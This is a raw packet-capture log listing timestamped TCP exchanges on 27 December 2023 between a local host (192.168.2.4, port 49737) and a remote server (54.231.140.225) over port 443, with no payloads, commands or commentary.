Dec 27, 2023 18:12:20.152023077 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152053118 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152054071 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152059078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152081013 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152098894 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152266026 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152285099 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152319908 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152328014 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152332067 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152364969 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152565956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152582884 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152618885 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152621984 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152641058 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152647972 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152651072 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152771950 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152789116 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152816057 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152821064 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.152888060 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153100967 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153127909 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153151989 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153153896 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153162956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153173923 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153198957 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153506994 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153521061 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153557062 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153558016 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153563976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153575897 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153592110 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153667927 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153685093 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153714895 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153718948 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153743982 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153881073 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153908014 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153929949 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153929949 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153938055 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.153954983 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.153975964 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.154160023 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.154175043 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.154203892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.154208899 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.154227972 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.154241085 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.155054092 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189186096 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189218044 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189253092 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189264059 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189280987 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189301968 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189335108 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189583063 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189603090 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189631939 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189656973 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189671040 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189675093 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189894915 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189925909 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189943075 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189946890 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.189963102 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189986944 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.189995050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190047979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190129042 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190143108 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190191031 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190222979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190222979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190228939 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190237999 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190488100 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190505028 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190535069 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190538883 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190558910 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190597057 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190622091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190644979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190648079 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190675974 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190921068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190958023 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.190975904 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.190984011 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191005945 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191035032 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191060066 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191072941 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191109896 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191118002 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191157103 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191205025 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191319942 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191333055 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191375017 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191380024 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191519976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191538095 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191569090 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191575050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191600084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191869974 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191879988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191917896 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191920996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191942930 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.191981077 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.191998005 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192015886 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192018986 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192043066 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192203999 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192229033 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192248106 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192281008 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192281008 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192281008 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192290068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192305088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192327976 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192331076 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192352057 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192363024 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192365885 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192847013 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192859888 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192898989 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192903042 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192915916 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.192939997 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192962885 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.192986012 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193013906 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193013906 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193017006 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193027020 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193043947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193062067 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193063021 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193069935 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193083048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193100929 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193608046 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193638086 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193689108 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193690062 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193690062 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193696976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193726063 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193730116 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193737030 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193752050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193772078 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193775892 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193795919 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193815947 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193815947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193825960 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193855047 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193861961 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193866014 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193912983 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.193933964 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.193960905 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.194006920 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.194026947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.194053888 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.194056988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.194080114 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.194096088 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.194097996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.194106102 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.194123983 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.194137096 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.194169044 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.194173098 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.231645107 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.231673002 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.231702089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.231714964 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.231724024 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.231733084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.231806040 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.302581072 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.302656889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.302686930 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.302700043 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.302725077 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.302757978 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.302762032 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.302830935 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.302853107 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.302923918 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.302930117 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303087950 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303102016 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303153038 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303157091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303312063 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303347111 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303368092 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303371906 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303376913 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303401947 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303443909 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303577900 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303592920 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303613901 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303627968 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303632975 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303669930 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303669930 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303775072 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303793907 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303822994 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.303827047 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.303886890 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304080963 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304106951 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304133892 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304136992 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304145098 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304172039 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304193974 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304303885 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304317951 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304353952 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304367065 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304372072 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304441929 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304469109 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304487944 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304529905 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304534912 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304568052 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304908037 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304920912 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304954052 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.304958105 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.304980993 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305135012 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305154085 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305186033 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305190086 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305211067 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305402994 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305419922 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305465937 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305470943 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305485010 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305552006 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305571079 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305610895 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305614948 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305635929 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305785894 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305840969 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305862904 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.305866957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.305907011 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306163073 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306189060 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306210995 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306262970 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306262970 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306268930 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306313992 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306452036 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306466103 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306494951 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306508064 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306510925 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306540966 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306745052 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306762934 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306793928 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.306797981 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.306821108 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307121992 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307135105 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307173014 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307178020 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307212114 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307274103 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307295084 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307322979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307326078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307357073 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307425022 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307450056 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307471037 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307481050 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307485104 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307497978 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307540894 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307589054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307605028 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307626963 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307642937 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307646990 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307657003 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307673931 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307774067 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307791948 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.307859898 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307859898 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.307863951 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308020115 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308032990 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308068991 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308073044 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308094025 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308269024 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308286905 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308325052 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308329105 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308341980 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308475971 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308489084 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308523893 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308528900 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308547974 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308806896 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308830976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.308875084 CET	49737	443	192.168.2.4	54.231.140.225
